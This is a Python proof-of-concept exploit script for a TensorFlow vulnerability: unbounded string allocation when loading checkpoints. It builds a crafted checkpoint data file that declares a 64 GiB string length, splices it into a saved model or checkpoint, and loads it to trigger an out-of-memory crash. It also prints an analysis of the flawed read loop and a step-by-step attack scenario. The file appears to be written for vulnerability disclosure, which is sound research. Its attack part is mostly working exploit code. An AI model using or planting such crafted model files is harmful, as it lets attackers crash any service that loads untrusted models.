tf-poc-checkpoint-string-dos / poc_tf_checkpoint_string_dos.py
0xiviel's picture
Upload poc_tf_checkpoint_string_dos.py
2704af5 verified
#!/usr/bin/env python3
"""
PoC: TensorFlow Checkpoint String Tensor Unbounded Allocation DoS
=================================================================
CVE: TBD
Target: tensorflow/core/util/tensor_bundle/tensor_bundle.cc
Trigger: tf.saved_model.load() or tf.train.load_checkpoint()
Vulnerability:
ReadStringTensor() reads varint64 string_lengths from attacker-controlled
checkpoint data files. No validation that individual string_length values
or their sum are bounded by entry.size(). An attacker can craft a checkpoint
where a string tensor with shape [1] declares a single string of 64 GiB
(0x1000000000 bytes), causing an immediate OOM crash in tstring::resize().
CRC32 checksums are NOT a security boundary — the attacker controls both
the data file content AND the crc32c field in BundleEntryProto metadata.
Root Cause:
tensor_bundle.cc:151-159 — ReadStringTensor() inner loop:
buffer->resize(string_length); // string_length from attacker varint64
ReadNBytes(string_length, ...); // reads from file
No check: sum(string_lengths[i]) <= entry.size() - overhead
No check: individual string_length <= entry.size()
Impact:
- Process crash (OOM / std::terminate) on loading malicious SavedModel
- Denial of service for any application using tf.saved_model.load()
- No authentication required — victim just needs to load a model file
Additionally affected: ReadVariantTensor() at line 188 (same pattern).
GetValue() has NO size validation at all for DT_VARIANT tensors (line 998).
"""
import os
import sys
import struct
import tempfile
import shutil
def encode_varint64(value):
    """Encode a non-negative integer as a protobuf varint64.

    Each output byte carries 7 payload bits, least-significant group first;
    the continuation bit (0x80) is set on every byte except the last.

    Args:
        value: Integer in the range [0, 2**64 - 1].

    Returns:
        The varint encoding as ``bytes`` (1 to 10 bytes long).

    Raises:
        ValueError: If ``value`` is negative or does not fit in 64 bits.
    """
    if value < 0 or value > 0xFFFFFFFFFFFFFFFF:
        # A negative int would otherwise fall straight through the loop and
        # encode as one truncated byte (e.g. -1 -> b'\x7f'); anything wider
        # than 64 bits is not a valid varint64.
        raise ValueError(f"varint64 value out of range: {value!r}")
    result = bytearray()
    while value > 0x7F:
        result.append((value & 0x7F) | 0x80)
        value >>= 7
    result.append(value)  # final group, continuation bit clear
    return bytes(result)
def encode_fixed32(value):
    """Return the 4-byte little-endian encoding of ``value``.

    Only the low 32 bits are kept, so negative or wider integers wrap
    modulo 2**32 instead of raising.
    """
    low_word = int(value & 0xFFFFFFFF)
    return low_word.to_bytes(4, "little")
def crc32c_value(data):
    """Compute the (unmasked) CRC-32C / Castagnoli checksum of ``data``.

    Uses ``crcmod`` when it is installed; otherwise falls back to a
    bit-at-a-time pure-Python implementation (reflected polynomial
    0x82F63B78, init and final XOR 0xFFFFFFFF). The fallback is slow but
    adequate for the few dozen bytes this script checksums.

    Args:
        data: Bytes-like object to checksum.

    Returns:
        The CRC-32C as an int in [0, 2**32 - 1].
    """
    try:
        # Import the submodule explicitly rather than relying on the package
        # __init__ to expose ``crcmod.predefined``.
        import crcmod.predefined
    except ImportError:
        pass
    else:
        return crcmod.predefined.mkCrcFun('crc-32c')(data)

    # NOTE: zlib.crc32 is CRC-32 (IEEE polynomial), not CRC-32C, and yields
    # different values -- it cannot stand in for the Castagnoli CRC.
    crc = 0xFFFFFFFF
    for byte in bytes(data):
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x82F63B78 if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF
def crc32c_mask(crc):
    """Apply TensorFlow's CRC32C masking to ``crc``.

    The 32-bit value is rotated right by 15 bits, then the constant
    0xA282EAD8 is added; the sum wraps modulo 2**32.
    """
    mask_delta = 0xA282EAD8
    word = 0xFFFFFFFF
    rotated = ((crc >> 15) | (crc << 17)) & word
    return (rotated + mask_delta) & word
def create_malicious_checkpoint_data():
    """
    Build the raw data-file bytes for a DT_STRING tensor of shape [1].

    Layout (N strings; here N = 1):
      [varint64 string_length_0] ... [varint64 string_length_N-1]
      [uint32 masked CRC32C of the lengths]
      [string_data_0] ... [string_data_N-1]

    string_length_0 is 0x1000000000 (64 GiB). Per the module docstring,
    ReadStringTensor() resizes the destination string to this length
    before reading any payload bytes.

    Returns:
        (data, overall_crc): the assembled bytes and the unmasked CRC32C
        computed over those bytes.
    """
    huge_length = 0x1000000000  # 64 GiB

    # The length checksum covers the length as a little-endian uint64 (its
    # in-memory value), not its varint encoding; it is then masked.
    length_checksum = crc32c_mask(crc32c_value(struct.pack('<Q', huge_length)))

    # Small zero-filled placeholder for the string payload: the oversized
    # resize is expected to fail before any payload would be read.
    placeholder = b'\x00' * 16

    data = b"".join((
        encode_varint64(huge_length),
        encode_fixed32(length_checksum),
        placeholder,
    ))

    # NOTE(review): unlike the length checksum above, this CRC is taken over
    # the varint-encoded bytes; confirm which convention the reader expects.
    # The callers in this file ignore this value.
    return data, crc32c_value(data)
def demo_vulnerability_analysis():
    """Print a walkthrough of the vulnerability; TensorFlow is not required.

    Emits three fixed explanatory sections (the vulnerable read loop, the
    attack scenario, and the DT_VARIANT variant of the bug), then a summary
    of the bytes produced by create_malicious_checkpoint_data().
    """
    heavy_rule = "=" * 72
    light_rule = "-" * 50

    for banner_line in (
        heavy_rule,
        "TensorFlow Checkpoint String Tensor DoS — Vulnerability Analysis",
        heavy_rule,
        "",
    ):
        print(banner_line)

    # (title, body) pairs; each body is printed verbatim under a rule line.
    sections = (
        ("VULNERABLE CODE: tensor_bundle.cc:151-159", """
for (size_t i = 0; i < num_elements; ++i) {
const uint64 string_length = string_lengths[i]; // FROM FILE
tstring* buffer = &destination[i];
buffer->resize(string_length); // <-- UNBOUNDED ALLOCATION
size_t bytes_read = 0;
TF_RETURN_IF_ERROR(
buffered_file->ReadNBytes(string_length, &(*buffer)[0], &bytes_read));
}
"""),
        ("ATTACK SCENARIO:", """
1. Attacker crafts a SavedModel with a DT_STRING variable
2. In the checkpoint data file, the varint64 string_length = 64GB
3. CRC32C checksum in BundleEntryProto.crc32c is set correctly
(attacker controls both data and metadata — CRC is not a security check)
4. Victim loads model: tf.saved_model.load('malicious_model/')
5. BundleReader::Lookup() → GetValue() → ReadStringTensor()
6. tstring::resize(64GB) → std::bad_alloc → std::terminate() → CRASH
"""),
        ("ALSO AFFECTED: ReadVariantTensor (tensor_bundle.cc:188)", """
string buffer;
buffer.resize(string_length); // <-- SAME UNBOUNDED ALLOCATION
GetValue() has NO size validation for DT_VARIANT (line 998-1009).
For DT_STRING, the "lower_bound" check is too weak:
lower_bound = NumElements (e.g., 1 for shape [1])
entry.size() just needs to be >= 1 — trivially satisfied.
"""),
    )
    for title, body in sections:
        print(title)
        print(light_rule)
        print(body)

    print("MALICIOUS DATA FILE CONSTRUCTION:")
    print(light_rule)
    payload, overall_crc = create_malicious_checkpoint_data()
    summary = (
        f" Data file size: {len(payload)} bytes",
        " Encoded varint64 string_length: 0x1000000000 (64 GB)",
        f" Overall CRC32C: 0x{overall_crc:08X}",
        f" Data hex dump: {payload[:32].hex()}",
        "",
    )
    for line in summary:
        print(line)

    # Re-encode the same 64 GiB length on its own to show the raw varint bytes.
    encoded = encode_varint64(0x1000000000)
    print(f" Varint64 encoding of 64GB: {encoded.hex()} ({len(encoded)} bytes)")
    print()
def poc_with_tensorflow():
    """
    Full PoC: save a SavedModel holding a string variable, overwrite its
    variables data file with the crafted bytes, then try to load it.

    Requires TensorFlow.

    Returns:
        True if the load was attempted and the process survived it;
        False if TensorFlow is missing or no variables data file was found.
        On False this function does NOT print the analysis itself -- the
        caller decides whether to fall back to demo_vulnerability_analysis()
        (the script's default path does), so it is shown only once.
    """
    try:
        import tensorflow as tf
    except ImportError:
        print("[!] TensorFlow not installed. Running analysis-only mode.")
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating legitimate SavedModel with string variable...")
    tmpdir = tempfile.mkdtemp(prefix="tf_poc_")
    model_dir = os.path.join(tmpdir, "saved_model")
    try:
        # Step 1: Create a legitimate SavedModel with a string variable.
        class SimpleModule(tf.Module):
            def __init__(self):
                super().__init__()
                self.v = tf.Variable(["hello"], dtype=tf.string, name="str_var")

            @tf.function(input_signature=[])
            def get_value(self):
                return self.v

        module = SimpleModule()
        tf.saved_model.save(module, model_dir)
        print(f"[+] Saved legitimate model to: {model_dir}")

        # Step 2: Find the data file. os.listdir order is arbitrary, so sort
        # to pick the same shard on every run.
        var_dir = os.path.join(model_dir, "variables")
        data_files = sorted(
            name for name in os.listdir(var_dir)
            if name.startswith("variables.data")
        )
        if not data_files:
            print("[-] No data files found!")
            return False
        data_path = os.path.join(var_dir, data_files[0])
        print(f"[*] Data file: {data_path}")
        print(f"[*] Original data file size: {os.path.getsize(data_path)} bytes")

        # Step 3: Overwrite the data file with the crafted bytes:
        # [varint64 string_length_0][uint32 length_crc][string_bytes]
        malicious_data, _ = create_malicious_checkpoint_data()
        with open(data_path, "wb") as f:
            f.write(malicious_data)
        print(f"[*] Wrote malicious data file ({len(malicious_data)} bytes)")
        print("[*] Malicious string_length = 64 GB (0x1000000000)")
        # NOTE(review): the .index file is left untouched, so the entry's
        # recorded size/CRC no longer match these bytes. The claim that the
        # oversized allocation happens before the CRC check comes from the
        # original analysis and is not verified by this script.

        # Step 4: Attempt to load. A hard crash (OOM killer / std::terminate)
        # ends the process before the except clause is reached -- that is the DoS.
        print()
        print("[!] Attempting to load malicious model...")
        print("[!] Expected: OOM crash or std::terminate")
        print()
        try:
            tf.saved_model.load(model_dir)
        except Exception as e:  # report any TF-level error and keep going
            print(f"[+] Exception caught: {type(e).__name__}: {e}")
        else:
            print("[-] Load succeeded unexpectedly")
        return True
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)
def poc_direct_checkpoint():
    """
    Alternative PoC using object-based checkpoint save/restore (simpler trigger).

    Saves a tf.train.Checkpoint holding a one-element string variable,
    overwrites its data shard with the crafted bytes, then restores it into
    a fresh variable.

    Returns:
        True if the restore was attempted and the process survived it;
        False if TensorFlow is missing (the analysis is printed instead) or
        no data shard was found.
    """
    try:
        import tensorflow as tf
    except ImportError:
        print("[!] TensorFlow not installed. Running analysis-only mode.")
        demo_vulnerability_analysis()
        return False

    print("[*] TensorFlow version:", tf.__version__)
    print("[*] Creating checkpoint with string variable...")
    tmpdir = tempfile.mkdtemp(prefix="tf_ckpt_poc_")
    ckpt_prefix = os.path.join(tmpdir, "malicious_ckpt")
    try:
        # Save a legitimate checkpoint first so TF writes a valid .index file.
        v = tf.Variable(["test_string"], dtype=tf.string, name="vuln_var")
        ckpt = tf.train.Checkpoint(var=v)
        save_path = ckpt.save(ckpt_prefix)
        print(f"[+] Saved checkpoint: {save_path}")

        # Locate the data shard; sort because os.listdir order is arbitrary.
        data_files = sorted(name for name in os.listdir(tmpdir) if ".data-" in name)
        if not data_files:
            print("[-] No data files found!")
            return False
        data_path = os.path.join(tmpdir, data_files[0])

        # Overwrite the shard with the crafted 64 GiB string_length bytes.
        malicious_data, _ = create_malicious_checkpoint_data()
        with open(data_path, "wb") as f:
            f.write(malicious_data)
        print("[*] Patched data file with 64GB string_length")
        print("[!] Loading malicious checkpoint...")

        # A hard crash (OOM killer / std::terminate) ends the process before
        # the except clause is reached -- that is the DoS.
        try:
            v2 = tf.Variable([""], dtype=tf.string, name="vuln_var")
            tf.train.Checkpoint(var=v2).restore(save_path)
        except Exception as e:  # report any TF-level error and keep going
            print(f"[+] Exception: {type(e).__name__}: {e}")
        else:
            print(f"[-] Restore succeeded unexpectedly. Value: {v2.numpy()}")
        return True
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)
if __name__ == "__main__":
    print("TensorFlow Checkpoint String Tensor DoS PoC")
    print("=" * 50)
    print()

    # Flag precedence: --analysis wins over --checkpoint; neither means the
    # SavedModel PoC, with the analysis as fallback when it reports failure.
    cli_args = set(sys.argv)
    if "--analysis" in cli_args:
        demo_vulnerability_analysis()
    elif "--checkpoint" in cli_args:
        poc_direct_checkpoint()
    elif not poc_with_tensorflow():
        demo_vulnerability_analysis()